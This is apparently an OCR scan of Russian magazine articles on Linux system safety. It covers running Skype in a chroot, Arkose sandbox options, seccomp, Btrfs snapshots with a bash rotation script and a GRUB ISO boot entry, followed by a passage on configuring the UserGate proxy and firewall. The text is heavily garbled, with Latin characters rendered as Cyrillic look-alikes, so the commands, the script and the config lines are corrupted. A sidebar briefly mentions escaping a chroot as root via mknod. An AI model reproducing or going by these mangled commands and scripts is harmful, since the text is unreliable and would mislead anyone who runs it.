Устанавливаем переменную 0І5РІАУ (которую надо посмо- 
треть в основной системе) и запускаем Зкуре: 

$ ехрог-Ь 0І5РІАУ=" ;0.0" 

$ зкуре --сІЬра1:Ь=/Иоте/зкуре/. Зкуре & 



ѵѵѵѵѵѵ.раіесгоѵѵ.сот/ 

-пример запуска 
демона в сіігооі- 
окружении. Несколь- 
ко устарело, однако 
общие принципы 
остались те же. 



Скайп успешно установлен и запущен в сИгооІ-окружении. 

Можно было бы написать скрипт для облегчения запуска, 
но это ты можешь сделать и сам. 

ИСПОЛЬЗОВАНИЕ АНК08Е 

Агкозе действует аналогично песочницам в ѴѴіпсІоѵѵз, таким, 
например, как ЗапсІЬохіе. Практически это удобная обертка 
для контейнеров ІХС. Но, как известно, удобство и гибкость 
порой несовместимы — тонкая настройка создаваемых кон- 
тейнеров затруднительна. Из плюсов отмечу интуитивно по- 
нятный интерфейс (это если использовать СІЛ — впрочем, 
запуск из командной строки тоже очень прост), из минусов 
же — по умолчанию требует довольно много свободного места 
на жестком диске и имеются некоторые возможные пути обхо- 
да: но, если использовать Агкозе как дополнительную обертку Развертывание в сИгооі 
для потенциальных путей внедрения малвари (браузер) или базовой системы с по- 

даже просто для экспериментов с каким-нибудь интересным мощью сіеЬооізиар 



опции КОМАНДНОЙ СТРОКИ АПКОЗЕ 



п {попе,аігесІ,«Иегѳ(І} — отображение сети на песочницу. 
Опции попе и сіігесі не требуют пояснения, бііегесі создает 
для каждой песочницы свой интерфейс. На практике же 
лучше использовать либо попе, либо сіігесі, поскольку 
ЯКегесІ настраивать достаточно долго, 
сі {попе,5у5Іет,8е55іоп,ЬоіИ} — доступ к шинам 0-Виз из пе- 
сочницы. 

8 размер — устанавливает размер хранилища в мегабай- 
тах. По умолчанию 2000 Мб для ех^4 или половина памяти 
для ІтрТз. После завершения работы запускаемой в песоч- 
нице программы хранилище уничтожается. 

I [ех14,ІшрІ8] — тип файловой системы хранилища. По де- 
фолту используется ех!4. 

ГООІ каталог — указывает каталог, который отображается 
на песочницу в качестве корня. 

гооМуре {соѵѵ,ЬіпсІ} — как именно отображать корень. Если 
использовать соѵѵ, то любые изменения после закрытия 
песочницы пропадут, а если Ьіпсі — сохранятся. 

Ьа 80 -ра(Іі — указывает место хранения песочницы. 

По умолчанию это ~/.агкозе. 

ЬІПСІ каталог и --соѵѵ каталог — отображает каталог либо в ре- 
жиме соѵѵ, либо напрямую. Естественно, использование 
той или иной опции зависит от типа отображения корня — 
использовать опцию --соѵѵ на каталоге, который и так уже 
сору-оп-ѵѵгііе, не имеет смысла. 

Ь — использовать реальный домашний каталог. Действует 
аналогично —Ьіпсі $НОМЕ. 
р — разрешает использовать РиІзеАисІіо. 



приложением, это никак не повредит. Перед тем как использо- 
вать Агкозе, его надо установить. Процедура стандартна: 

$ зисіо ар1;-§е1: Іпз1:а11 агкозе-^иі 

Будет установлен как графический интерфейс (агкозе-диі), 
так и утилита командной строки (агкозе). Графический интер- 
фейс настолько прост, что описывать его я смысла не вижу, луч- 
ше сразу перейдем к практике. Для примера запустим РігеТох: 

$ зисіо агкозе -п сіігесі: -р Ііге-Рох 

Данная команда запустит Рігеіох с доступом к сети 
и к РиІзеАисІіо. Поскольку для каждого вновь создаваемого 
контейнера по умолчанию создается свой домашний каталог, 
то и профиль огнелиса будет новый, без установленных до- 



Терминал - гоо1^от-иЬипги1210:/ѵаг/сНгооі - + х 

Файл Правка Вид Терминал Переход Справка 



I: СопТідигіпд ІіЬгеасіІіпеб: 1386. . . 

I: Сопі'ідигіпд ІоскГіІе-ргодз . . . 

: СопТідигіпд ру€Ноп3.2. . . 

I: СопТідигіпд йеЬсопТ-і18л. . . 

: СопГ^ідигіпд кеуЬоагсІ-сопТідигаТіоп. . . 
I: СопТідигіпд арС-и1іІ5... 

I: СопТІдигіпд дрдѵ... 

: СопТідигіпд ІзЬ-геІеазе . , . 

I: СопТідигіпд дпирд... 

; СопТІдигіпд арі... 

I: СопТІдигіпд игеасІаЛеасІ . . . 

I: СопТідигіпд 1одго«;аТе. . . 

I: СоігГідигіпд 1іЬс1еѵтаррег1.Ѳ2.1:і386. . . 
I: СопПдиПпд йтзеіир... 

I: СопТідигіпд е^ес^... 

I: СопТідигіпд сопзоіе-зеіир. . . 

:: СопТідигіпд кЬО... 

СопТідигіпд иЬипти-тіпітаІ. . . 

I: СопТідигіпд ІіЬс-Ып... 

I: СопТідигіпд іпіігатТз-ТооІз. . , 

Вазе зузіеш іпзіаІІеО зиссеззТиІІу . 
гооі^гост-иЬипТи12іѲ:/ѵаг/сГігоо^« | 



$ЕСС0МР И 8ЕСС0МР-ВРР 

Зессотр — малоизвестный механизм, внедренный 
еще в ядро 2.6.12, который позволяет процессу совер- 
шить односторонний переход в «безопасное» состоя- 
ние, где ему будет доступно только четыре системных 
вызова — ехіІО, зідгеІигпО, геас1() и ѵѵгіІеО, причем по- 
следние два доступны только для уже открытых фай- 
лов. Если же процесс попытается вызвать любой дру- 
гой сисколл, он будет немедленно убит. 

Очевидно, что это решение не очень гибкое. В свя- 
зи с этим в ядре 3.5 появился зессотр-ЬрГ который 
позволяет с помощью правил ВРР тонко настраивать, 
какие именно системные вызовы (и их аргументы) 
разрешены, а какие — нет. 8ессотр-Ьр1 применяется 
в Соодіе СЬготе, СЬготе ОЗ, а также бэкпортирован 
в ІІЬипІи 12.04. 
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Подушка безопасности 






Терминал - гот^гот-иЬип(и1210: 
Файл Правка Вид Терминал Переход Справка 



гого^гот-иЬип1и1210: зисіо ЫгТз зиЬѵоІ зпар -г / /зпарзпот -2Ѳ13-01-16 

[зисіо] раззмогР Тог гот: 

геаТе а геаропіу зпарзИоС оТ V іп Ѵ/зпарзЬот-гѳіЗ-Оі-іб' 
гот§гот-иЬит:иі21Ѳ:-$ | 



Ручное создание 
геасі-опіу снапшо- 
та в ВІгТз 



ПОДТОМА ВТКР$ 



полнений, если таковые у тебя имеются. «Но постой! Зачем 
же зисіо?» — может возникнуть резонный вопрос. Дело в том, 
что некоторые подготовительные операции доступны только из- 
под гооі Однако спешу тебя успокоить — запускаемая програм- 
ма будет работать с правами текущего пользователя. 

СОЗДАНИЕ И УДАЛЕНИЕ СНАПШОТОВ 

Для совершения операций над ФС нового поколения, таких, на- 
пример, как создание снапшотов, дефрагментация тома и мно- 
гих других, служит команда Ыгіз. Синтаксис у нее, в общем слу- 
чае, следующий: 

Ыіг-Рз <команда> <аргументы> 

Какие же именно операции можно производить над Віііз? 
Ниже будут приведены команды, которые мне показались ин- 
тересными. 

• Ь^гіз зиЬѵоІ сгеаіе [<путь>/]<имя> — создает подтом (см. 
врезку). Если путь не указан, создает его в текущей дирек- 
тории. 

• ЬИз зиЬѵоІ беіеіе <имя> — соответственно, удаляет подтом. 

• Ыііз зиЬѵоІ Япб-пеѵѵ <путь> <поколение> — список послед- 
них модифицированных файлов в указанном пути, начиная 
с указанного поколения. К сожалению, пока что нет возмож- 
ности простым способом узнать текущее поколение того или 
иного файла, поэтому применение этой команды может со- 
провождаться танцами с бубном. 

• Ыгіз зиЬѵоІ зпарзііоі [-г] <подтом> <путь к снапшоту> — 
гвоздь программы. Создает снапшот указанного подтома 
с указанным путем к нему же. Опция -г делает невозможной 
запись в снапшоты. 

• Ыгіз зиЬѵоІ Іізі <путь> — показывает список подтомов 
и снапшотов по указанному пути. 



Подтом Віііз может выступать в двух ипостасях: как директория 
и как объект ѴР8 — то, что может быть примонтировано. На- 
пример, при установке ІІЬипіи создается два подтома — @ и @ 
Йоте. Первый содержит системные файлы, второй — данные 
пользователя. Это похоже на разбиение диска на разделы, толь- 
ко если раньше один раздел мог содержать, как правило, лишь 
один объект ѴР5, то теперь на одном разделе могут быть сразу 
несколько объектов, при этом они могут быть вложенными. 



ЫгТз ЯІезуз — использование места для указанной точки 
монтирования. 

Ыгіз Тііезуз гезіге [+/-]<новый размер>[д/к/т] <путь> — да- 
да, в ВІГІЗ есть возможность изменять размер на «живой» 
системе, причем не только увеличивать, но и уменьшать! 
С аргументами, думаю, все более-менее ясно, но, помимо 
указания размера, можно использовать аргумент тах, кото- 
рый расширяет ФС до максимально возможного размера. 



Добавление пользо- 
вателя для запуска 
ЗкуревсНгооІ 



^ Терминал -гооІ^от-иЬипші 210:- - + х 

Файл Правка Вид Терминал Переход Справка 



Т:-А# 'аООдгоир --діО 1Ѳ0Ѳ зкуре 
дгоир зкуре* (СЮ 1ѲѲѲ) ... 

аООизег - -иізаЫесі-раззмогсІ --Тогсе --иіО 1ѲѲ0 --діО 1ѲѲѲ зкуре 
іпд изег зкуре* ... 

іпд пе« изег зкуре* (1ѲѲѲ) ѵатп дгоир зкуре* ... 

Поте Оігестогу /Поше/зкуре* аІгеаОу ехізьз. N 01 : соруіпд Тгот /еіх/зкеі*. 
Папдіпд іПе изег іпГогтатіоп Тог зкуре 
: Тег ТПе пем ѵаіие, ог ргезз ЕNТЕК Тог тпе ОеТаиІС 
Риіі Nате [] : 

Корт МитЬег 
Ѵіогк РПопе []: 

Ноте РПопе [ ] : 

ОТПег []: 

Із ТПе іпГогтаТіоп соггесТ? [У/п] 

I 



КРАТКО О ВТРР$ 



Остальные команды хоть и интересны, но к теме статьи 
относятся лишь постольку-поскольку, и их мы рассматривать 
не будем. Итак, чтобы создать снапшот подтома с текущей 
датой, например корневого каталога, набираем следующую 
команду: 

$ зисіо Ыіг-Рз зиЬѵоІ зпар -г / /зпарзЬо1;-2013-01-1б 

Снапшот создан. Опцию -г я рекомендую использовать 
для пущей безопасности — теперь файлы из него можно уда- 
лить, только удалив снапшот целиком: 

$ зибо Ыіг-Рз зиЬѵоІ беі /зпарзЬо1:-2013-01-16 

АВТОМАТИЗАЦИЯ 

Создавать снапшоты ручками я не вижу большого смысла — 
можно банально забыть это сделать. Напрашиваются три сце- 
нария автоматизации: 

• написать скрипт и поместить его в гс.іосаі; 

• написать скрипт и поместить его в сгоп; 

• использовать команду Ыііз аиіозпар. 



Бывает, что после установки обновлений система рушится. Здесь пригодились 
бы средства, аналогичные компоненту «Восстановление системы» ѴѴіпбоѵѵз. 

С гордостью заявляю — их есть у нас! И одно из этих средств — Віііз. Из достоинств 
новой файловой системы от Огасіе стоит отметить следующие: 



К сожалению, в УЬипШ 12.10 последний метод по каким-то 
причинам недоступен, так что выбора как такового практически 
нет. Лично я предпочел написать скрипт для крона, но снача- 
ла давай создадим подтом, в котором и будут храниться наши 
снапшоты. Для чего? Хотя бы для того, чтобы не засорять кор- 
невую папку. 



Копирование при записи (Сору-оп- 
ѴѴгіІе). Эта технология служит для 
создания снапшотов — мгновенных 
снимков состояния системы. При соз- 
дании снапшота драйвер ФС копирует в 
него метаданные и начинает монито- 
рить фактическую запись. Если она 
обнаруживается, в снапшот помещают- 
ся оригинальные блоки данных, а на их 
место записываются новые. 

Сжатие файлов. 



Динамическое выделение инодов. В от- 
личие от ФС старого поколения, в Вігіз 
нет ограничения на количество файлов. 
Возможность размещения ФС на не- 
скольких физических носителях. Фак- 
тически это тот же самый РАЮ, только 
более высокоуровневый. На момент 
написания статьи поддерживались 
РАЮ о, РАЮ 1 и РАЮ 10, поддержка же 
РАЮ 5 находилась на ранней стадии 
разработки. 



# ткбіг /тп1;/зба11 

# тоипі: /беѵ/збаіі /тп'ЬУзбаІІ 

# Ыіг-Рз зиЬурІ сгеаіе /тп^/зба 11 /@зпарзІіо 1 :з 

# итоипі: /тп-Ь/збаІІ 

Рассмотрим, что делают эти команды. Поскольку факти- 
ческий корень ФС в данный момент недоступен (вместо него 
в убунте в качестве корня используется подтом @), мы вынуж- 
дены подмонтировать его ручками. В моем случае он нахо- 
дится на /беѵ/зба11. Третьей командой мы создаем подтом @ 
зпарзИоІз — таким образом, если мы не подмонтируем его или 
реальный корень, его содержимое будет недоступно. А теперь 
собственно скрипт: 





ігг 



ипіхош 
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аи-ко5пар.5И 

#!/Ьіп/Ьа5Ь 

5ѲІ: -е 

ѴОіиМЕ=/гіеуУ:іі1а11 „ 

ТМР_РАТН=/-1:тр/5пар5Ііо1;5 

МО^NТ_ОРТ5=^5иЬѵо1=@5пар5І^о1;5" 

# Те.кужие Аата и время . -..необхожиш..^ 

# для формирования имен папок со снапш^ТА^^ 

N0V^I="$(сIа1:е +%У%т%сІ%Н%М)" 

М0М_5ЕС="$(сІа1:е +%5)" 

і-Р [ $# -пе 1 ]; Ііііеп 

.# ..Есл и с крипт -.запущен ар гументов ^ 

# ставим по умолчанию один .день назад 

0іРЕК_5ЕС="$(с1а1:е --сіа1:е ”1 сіау а§о" +%5),:; 

еІ5е 

.# ..Есл-И же у. нас указан аргумент д считаем^ 

.что. это дата, в любом формате, который 

# понимает команда ..гіа.іе.д . с.о...в.семи вытекающим 

010ЕК_5ЕС="$(сІа1:е — сІаТе "ІІ" +%5)" 

б 

# Вычитаем из текущей даты --Тре6уе.му.ю 

# и преобразуем ее в минуты 

ОЮЕВ=$( ($М01лІ_5ЕСг$РіРЕК_.5ЕС) ) 

ОІОЕК_МІМ=$(($ОІОЕК/60)> 

[ ! -СІ ’’${ТМР_.РАТН}/" ] && тксііг "${ТМР_РАТН}/" 

[ -2 ”'8і"ер ''${ТМР_РАТН}\\ /ргрс/тоипТзѴ" — 

&& тоипТ ”${ѴОіиМЕ}" "${ТМР_РАТН}/’* -о_е 

’■${МО^NТ_ОРТ5}" && { # Монтируем 

тксИг "${ТМР_РАТН}/${NОIлI}/" 

# Создаем снапшоты 

Ьгг-Р5 БцЬѵоІ 5пар / "${ТМР_РАТН}/${М01л1}/.м 

гооТ 5 па р " > / сіе ѵ/ п и 1 1 2 >&1 

ЬТг-Рз зиЬѵоІ 5пар /Йоте "${ТМР_РАТН}/${М01л1}/е 

Иотезпар" > /с1еѵ/пи11 2>&1 

} && { 

# Ищем папки со снапшотами старше указанно.й. даты 
-Рог -Р іп 'бпсі ’*${ТМР_РАТН}" -тіпаерТИ 1 ^ 

-тахсІерТИ 1 -Туре сі -стіп +"$010ЕК_МІМ" 

-ргіпТѲ |хаг§5 -0'; 
сіо 

ЬТгбБ зиЬѵоІ сіеі ''${б}/гооТ5пад" 

> /сіеу/пиіі 2>&1 && 

ЬТг-Рб зиЬуоІ сіеі "${-Р}/Иоте5пар" 

> /сіеѵ/пиіі 2>&1 && 

# и удаляем снапшоты и ..пап.кид их содержащие 

гтсііг "$6" 

сіопе 

} 

итоипТ -1 "${ТМР_РАТН}" && гтсііг "${ТМР_РАТН}1. 

Скрипт этот можно разместить, где удобно (лично я предпо- 
читаю подобные вещи размещать в /изг/ІосаІ/Ьіп, но это дело 
вкуса), и запускать его либо из крона, либо из гс.іосаі. По умол- 
чанию скрипт ротирует снапшоты старше одного дня, но ты мо- 
жешь задать любое желаемое количество в формате команды 
баіе — главное, не забудь заключить в кавычки. 

ИСПОЛЬЗОВАНИЕ 180-ОБРАЗА 

Для того чтобы при повреждении каких-либо жизненно важных 
файлов не дергать каждый раз болванку с записанной убунтой, 
есть возможность в меню ОгиЬ добавить пункт загрузки с 180- 
образа, что я и предлагаю сделать. Для этого понадобится не- 
ВМз-раздел (поскольку по неизвестным причинам стандартная 
іпіігат^э убунтовской исошки не желает видеть образ, если 
он находится на разделе с описываемой ФС) и прямые руки. 



^ Терминал * готв>гот-иЬипТи1210: /еТс/^гиЬ.д 

Файл Правка Вид Терминал Переход Справка 


~ 4- X 


зеі: заѵесі епі:гу="\${ргеѵ заѵесі ептгу}*\ 
заѵе. епѵ заѵесі ептгу 
зеТ ргеѵ_заѵесІ_епі:гу= 
заѵе. епѵ ргеѵ_заѵесі .епігу 
зеТ Ьооі .^опсе=і;гие 
і 


1 


ипсііоп заѵесіе^аиіг { 
іТ [ -2 "\${Ьоо«:_опсе}” ]; гпеп 
заѵеР епІгу=’‘\5{сПозеп}" 
заѵе_епѵ заѵес1..епг:гу 
Ті 

} 




ТипсТіоп гесогОГаіІ { 
зеС гесогсіТаі1=1 

іТ [ -п І\5{Паѵе_дгиЬепѵ>" ]; ТПеп іТ [ -2 "\${Ьоот опсе}" ] 
согОТаіІ; Ті; Ті 


; ТПеп заѵе.епѵ , 


ТипсТіоп Іоасі ѵіРео { 

ЕОР 

Т [ -п '•${6К^В..VI^Е0..ВАСКЕN^}" ]; ТПеп 
саТ «ЕОР 

ІпзгаоР ${6КиВ„ѴІ0Е0 ВАСКЕМО) 





Редактируем конфиг 
СгиЬ'а 




ІКРО 

Если ты работаешь 
в сЬгооІ-окружении под 
гооі, то есть возможность 
оттуда вырваться. Один 
из способов - использо- 
вание системного вызова 
ткпобО с последующим 
монтированием реаль- 
ного корня. Установка 
патчсетадгзесигііу 
позволяет решить эту 
проблему. 



Добавляем в файл /еІс/дгиЬ.б/40_си5гот следующие строчки: 

тепиеп1:гу "иЬипіи 12.10 І38б І5о" { 

іпБтосІ раг1:_т5СІ05 

іпзтосі -Раі 

# Устанавливаем, корень* ..О.ткуАа.-.бер.Ш 15^^ 

зеі: гооі= ’ ІісІ0дт5СІО57' 

. # ,Пу т.ь .. к -О.бра. зу...отнрс.и.т.вл.ь.но..у а н ного выше корня 

зе'Ь і5об1е=/иЬип-Си-12 . 10-гіе5к1:ор.-і38б 

.....#..М.о.нтиру.ем. В- .качестве. ІоорЬа.ск-Аевайса в бгиЬ. 

ІоорЬа с к . Іорр .$.і.5.об.1.е 

1 і п и X С 1оор.)/.с.а.5.р.е.гУ.у.т.1.і.пи 2 Ьоо1: = с а 5 ре г ^ 

.. і5о-5сапУб1епате=$і5об1е поезесі порготрі -- 
іпіігсі (1оор)Уса5рер/іпіігФ.І2 

и запускаем команду обновления основного конфига ОгиЬ: 

$ 5исІо ирсІаіе-бгиЬ 

Теперь даже в случае серьезного повреждения системы — 
если, конечно, не будет затронут загрузчик и его файлы — 
ты всегда сможешь загрузиться с 180-образа и изменить по- 
врежденные файлы или откатиться на предыдущее состояние 
системы. Предположим, ты уронил систему и тебе необходимо 
ее восстановить из снапшота Вігіз. Для этого загрузись с данного 
180-образа, примонтируй тот раздел, систему на котором ты уро- 
нил, — именно раздел, не подтом! — и введи следующие команды 
(естественно, с поправкой на твои снапшоты и разделы): 

# ссі /тпі/5СІа11 

# тѵ @ @_Ьас1гоо1; 

# тѵ @5пар5Іто1;5/201302011434/ГРр1:5пар @ 

То же самое, при необходимости, делаем с @Иоте и пере- 
загружаемся. Если все прошло нормально, то можешь удалить 
@_Ьас1гоо1: 

$ зисіо ЬТг-Рз зиЬѵоІ сіеі @_ЬасігорТ 



Теперь даже в случае серьезного поврежде- 
ния системы — если, конечно, не будет 
затронут загрузчик и его файлы — ты 
всегда сможешь загрузиться с І 80 -образа 



ЗАКЛЮЧЕНИЕ 

В *піх-системах есть множество способов обезопасить себя 
от неудачных экспериментов или смягчить их последствия. 
Я рассмотрел некоторые из них. Однако стоит заметить, что все 
эти способы предназначены в основном для экспериментато- 
ров, любящих поковыряться в системе. Для отлова малвари они 
не подходят — их достаточно легко обнаружить, хотя некоторый 
уровень безопасности они, конечно же, обеспечивают. ІЕ 
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организация совмест- 
ного доступа к интер- 
нету пользователей 
локальной сети — 
одна из наиболее рас- 
пространенных задач, 
с которыми приходит- 
ся сталкиваться си- 
стемным администра- 
торам. Тем не менее 
до сих пор она вызыва- 
ет много затруднений 
и вопросов. Напри- 
мер — как обеспечить 
максимальную без- 
опасность и полную 
управляемость? 
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Настройка сетевых интерфейсов 



Настройка ОН5 



ВВЕДЕНИЕ 

Сегодня мы подробно рассмотрим, как организовать совместный доступ 
к интернету сотрудников некой гипотетической компании. Предположим, 
что их количество будет лежать в пределах 50-100 человек, а в локальной 
сети развернуты все обычные для таких информационных систем сервисы: 
домен ѴѴіпсІоѵѵз, собственный почтовый сервер, РТР-сервер. 

Для обеспечения совместного доступа мы будем использовать решение 
под названием ІІзегСаІе Ргоху & РігеѵѵаІІ. У него есть несколько особенностей. 
Во-первых, это чисто российская разработка, в отличие от многих локализо- 
ванных продуктов. Во-вторых, она имеет более чем десятилетнюю историю. 
Но самое главное — это постоянное развитие продукта. 

Первые версии этого решения представляли собой относительно про- 
стые прокси-серверы, которые могли только обеспечивать совместное ис- 
пользование одного подключения к интернету и вести статистику его исполь- 
зования. Наибольшее распространение среди них получил билд 2.8, который 
до сих пор еще можно встретить в небольших конторах. Последнюю же, ше- 
стую версию сами разработчики уже не называют прокси-сервером. По их 
словам, это полноценное ІЯМ-решение, которое охватывает целый спектр 
задач, связанных с безопасностью и контролем действий пользователей. Да- 
вай посмотрим, так ли это. 

РАЗВЕРТЫВАНИЕ НВЕНСАТЕ РНОХѴ& РІНЕѴѴАІІ 

В ходе установки интерес представляют два этапа (остальные шаги стандар- 
тны для инсталляции любого ПО). Первый из них — это выбор компонентов. 
Помимо базовых файлов, нам предлагается установить еще четыре сервер- 
ных компонента — это ѴРМ, два антивируса (Рапба и «Антивирус Касперско- 
го») и обозреватель кеша. 

Модуль ѴРМ-сервера устанавливается по необходимости, то есть ког- 
да в компании планируется использование удаленного доступа сотрудни- 
ков или для объединения нескольких удаленных сетей. Антивирусы имеет 
смысл инсталлировать только в том случае, если у компании приобретены 
соответствующие лицензии. Их наличие позволит сканировать интернет- 
трафик, локализовать и блокировать вредоносное ПО непосредственно 
на шлюзе. Обозреватель кеша обеспечит просмотр закешированных прок- 
си-сервером веб-страниц. 

Помимо этого, в состав дистрибутива входит еще два компонента. Пер- 
вый из них — «Консоль администратора». Это отдельное приложение, пред- 
назначенное, как это видно из названия, для управления сервером УзегОаІе 
Ргоху & РігеѵѵаІІ. Главная его особенность — возможность удаленного подклю- 
чения. Таким образом, администраторам или ответственным за использова- 
ние интернета лицам не нужен прямой доступ к интернет- шлюзу. 

Второй дополнительный компонент — веб-статистика. По сути, она пред- 
ставляет собой веб-сервер, который позволяет отображать подробную ста- 
тистику использования глобальной сети сотрудниками компании. С одной 
стороны, это, вне всякого сомнения, полезный и удобный компонент. Ведь 
он позволяет получать данные без установки дополнительного ПО, в том чис- 
ле и через интернет. Но с другой — он занимает лишние системные ресурсы 
интернет-шлюза. А поэтому его лучше устанавливать только в том случае, ког- 
да он действительно нужен. 

Второй этап, на который стоит обратить внимание в ходе инсталляции 
ІІзегСіаІе Ргоху & РігеѵѵаІІ, — выбор базы данных. В предыдущих версиях ІЮРР 
мог функционировать только с файлами МОВ, что сказывалось на произво- 
дительности системы в целом. Теперь же есть выбор между двумя СУБД — 



РігеЬігсІ и МуЗОГ. Причем первая входит в состав дистрибутива, так что при ее 
выборе никаких дополнительных манипуляций производить не нужно. Если 
же ты пожелаешь использовать Му801, то предварительно ее нужно устано- 
вить и настроить. После завершения установки серверных компонентов не- 
обходимо подготовить рабочие места администраторов и других ответствен- 
ных сотрудников, которые могут управлять доступом пользователей. Сделать 
это очень просто. Достаточно из того же самого дистрибутива установить 
на их рабочие компьютеры консоль администрирования. 

БАЗОВАЯ НАСТРОЙКА 

Вся настройка ІІзегСаІе Ргоху & РігеѵѵаІІ ведется с помощью консоли управ- 
ления. По умолчанию после установки в ней уже создано подключение к ло- 
кальному серверу. Однако если ты используешь ее удаленно, то соединение 
придется создать вручную, указав ІР-адрес или имя хоста интернет-шлюза, 
сетевой порт (по умолчанию 2345) и параметры авторизации. 

После подключения к серверу в первую очередь необходимо настроить 
сетевые интерфейсы. Сделать это можно на вкладке «Интерфейсы» разде- 
ла «Сервер ІІзегОаІе». Сетевой карте, которая «смотрит» в локальную сеть, 
выставляем тип Ц\М, а всем остальным подключениям — ѴѴАМ. «Временным» 
подключениям, таким как РРРоЕ, ѴРМ, автоматически присваивается тип РРР 

Если у компании есть два или более подключения к глобальной сети, 
причем одно из них основное, а остальные резервные, то можно настроить 
автоматическое резервирование. Сделать это довольно просто. Достаточ- 
но добавить нужные интерфейсы в список резервных, указать один или не- 
сколько контрольных ресурсов и время их проверки. Принцип работы этой 
системы таков. ІІзегСаІе автоматически с указанным интервалом проверяет 
доступность контрольных сайтов. Как только они перестают отвечать, про- 
дукт самостоятельно, без вмешательства администратора, переключается 
на резервный канал. При этом проверка доступности контрольных ресур- 



Дополнительные функции 

ЗАПРЕТ НЕЖЕЛАТЕЛЬНЫХ САЙТОВ 



ІІзегСаІе Ргоху & РігеѵѵаІІ поддерживает технологию 
Епіепзуз ОРГ РіІІегіпд. По сути, это облачная база 
данных, содержащая более 500 миллионов сайтов 
на разных языках, разбитых более чем по 70 кате- 
гориям. Основное ее отличие — постоянный мо- 
ниторинг, в ходе которого веб-проекты постоянно 
контролируются и при смене контента переносятся 
в другую категорию. Это позволяет с высокой до- 
лей точности запретить все нежелательные сайты, 
просто выбрав определенные рубрики. 

Применение Епіепзуз УРГ Ріиегіпд увеличивает безопасность рабо- 
ты в интернете, а также способствует повышению эффективности труда 
сотрудников (за счет запрета социальных сетей, развлекательных сайтов 
и прочего). Однако ее использование требует наличия платной подписки, 
которую необходимо продлевать каждый год. 
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Настройка синхронизации с Асііѵе Оігесіогу 




Публикация локального РТР-сервера в интернете 



СОВ по основному интерфейсу продолжается. И как только она оказывается 
успешной, автоматически выполняется переключение обратно. Единствен- 
ное, на что нужно обратить внимание при настройке, — это выбор контроль- 
ных ресурсов. Лучше взять несколько крупных сайтов, стабильная работа 
которых практически гарантирована. 

После этого можно переходить непосредственно к настройке прокси- 
серверов. Всего в рассматриваемом решении их реализовано семь штук: 
для протоколов НТТР (включая НТТРз), РТР, 80СКЗ, РОРЗ, 5МТР, 8ІР и Н323. 
Это практически все, что может понадобиться для работы сотрудников ком- 
пании в интернете. По умолчанию включен только НТТР-прокси, все осталь- 
ные можно активировать при необходимости. 

Прокси-серверы в УзегСаІе Ргоху & РігеѵѵаІІ могут работать в двух режи- 
мах — обычном и прозрачном. В первом случае речь идет о традиционном 
прокси. Сервер получает запросы от пользователей и переправляет их внеш- 
ним серверам, а полученные ответы передает клиентам. Это традиционное 
решение, однако в нем есть свои неудобства. В частности, необходимо на- 
страивать каждую программу, которая используется для работы в интернете 
(интернет-браузер, почтовый клиент, ІСО и прочее), на каждом компьютере 
в локальной сети. Это, конечно, большая работа. Тем более периодически, 
по мере установки нового программного обеспечения, она будет повторяться. 

При выборе прозрачного режима используется специальный МАТ- 
драйвер, входящий в комплект поставки рассматриваемого решения. 
Он прослушивает соответствующие порты (80-й для НТТР, 21 -й для РТР и так 
далее), детектирует поступающие на них запросы и передает их прокси-сер- 
веру, откуда они отправляются дальше. Такое решение более удачно в том 
плане, что настройка программного обеспечения на клиентских машинах уже 
не нужна. Единственное, что требуется, — в качестве основного шлюза в се- 
тевом подключении всех рабочих станций указать ІР-адрес интернет-шлюза. 

Следующий шаг — настройка пересылки 0М8-запросов. Сделать это 
можно двумя способами. Самый простой из них — включить так называемый 
□М8-форвардинг. При его использовании поступающие на интернет-шлюз 
от клиентов ОМ8-запросы перенаправляются на указанные серверы (мож- 
но использовать как ОМ8-сервер из параметров сетевого подключения, так 
и любые произвольные ОМ8-серверы). 

Второй вариант — создание МАТ-правила, которое будет принимать за- 
просы по 53-му (стандартный для 0М8) порту и переправлять их во внешнюю 
сеть. Однако в этом случае придется либо на всех компьютерах вручную про- 
писывать ОМ8-серверы в настройках сетевых подключений, либо настроить 
отправку ОМ8-запросов через интернет-шлюз с сервера контроллера домена. 

УПРАВЛЕНИЕ ПОЛЬЗОВАТЕЛЯМИ 

После завершения базовой настройки можно переходить к работе с поль- 
зователями. Начать нужно с создания групп, в которые впоследствии будут 
объединяться аккаунты. Для чего это нужно? Во-первых, для последующей 
интеграции с Асііѵе Оігесіогу. А во-вторых, группам можно присваивать пра- 
вила (о них мы поговорим позднее), таким образом управляя доступом сразу 
большого количества пользователей. 

Следующим шагом будет внесение в систему пользователей. Сделать это 
можно тремя разными способами. Первый из них, ручное создание каждого 
аккаунта, мы по понятным причинам даже не рассматриваем. Этот вариант 
подходит лишь для малых сетей с небольшим количеством пользователей. 
Второй способ — сканирование корпоративной сети АРР-запросами, в ходе 
которого система сама определяет список возможных аккаунтов. Однако мы 



выбираем третий, наиболее оптимальный с точки зрения простоты и удоб- 
ства администрирования вариант — интеграцию с Асііѵе Оігесіогу. Выполня- 
ется она на основе созданных ранее групп. Сначала нужно заполнить общие 
параметры интеграции: указать домен, адрес его контроллера, логин и па- 
роль пользователя с необходимыми правами доступа к нему, а также интер- 
вал синхронизации. После этого каждой созданной в УзегСаіе группе нужно 
присвоить одну или несколько групп из Асііѵе Оігесіогу. Собственно говоря, 
настройка на этом и заканчивается. После сохранения всех параметров син- 
хронизация будет выполняться в автоматическом режиме. 

Создаваемые в ходе авторизации пользователи по умолчанию будут ис- 
пользовать МТІМ-авторизацию, то есть авторизацию по доменному логину. 
Это очень удобный вариант, поскольку правила и система учета трафика бу- 
дут работать независимо от того, за каким компьютером в данный момент 
сидит пользователь. 

Правда, для использования этого метода авторизации необходимо до- 
полнительное программное обеспечение — специальный клиент. Эта про- 
грамма работает на уровне ѴѴіпзоск и передает на интернет-шлюз параме- 
тры авторизации пользователей. Ее дистрибутив входит в комплект поставки 
ІІзегОаІе Ргоху & РігеѵѵаІІ. Быстро установить клиент на все рабочие станции 
можно с помощью групповых политик ѴѴіпбоѵѵз. 

К слову сказать, МТЕМ-авторизация далеко не единственный метод ав- 
торизации сотрудников компании для работы в интернете. Например, если 
в организации практикуется жесткая привязка работников к рабочим стан- 
циям, то можно использовать для идентификации пользователей ІР-адрес, 
МАС-адрес или их сочетание. С помощью этих же методов можно организо- 
вать доступ к глобальной сети различных серверов. 

КОНТРОЛЬ ПОЛЬЗОВАТЕЛЕЙ 

Одно из значительных преимуществ ІІОРР составляют широкие возможности 
для контроля пользователей. Они реализуются с помощью системы правил 
управления трафиком. Принцип ее работы очень прост. Администратор (или 
другое ответственное лицо) создает набор правил, каждое из которых пред- 
ставляет собой одно или несколько условий срабатывания и выполняемое 
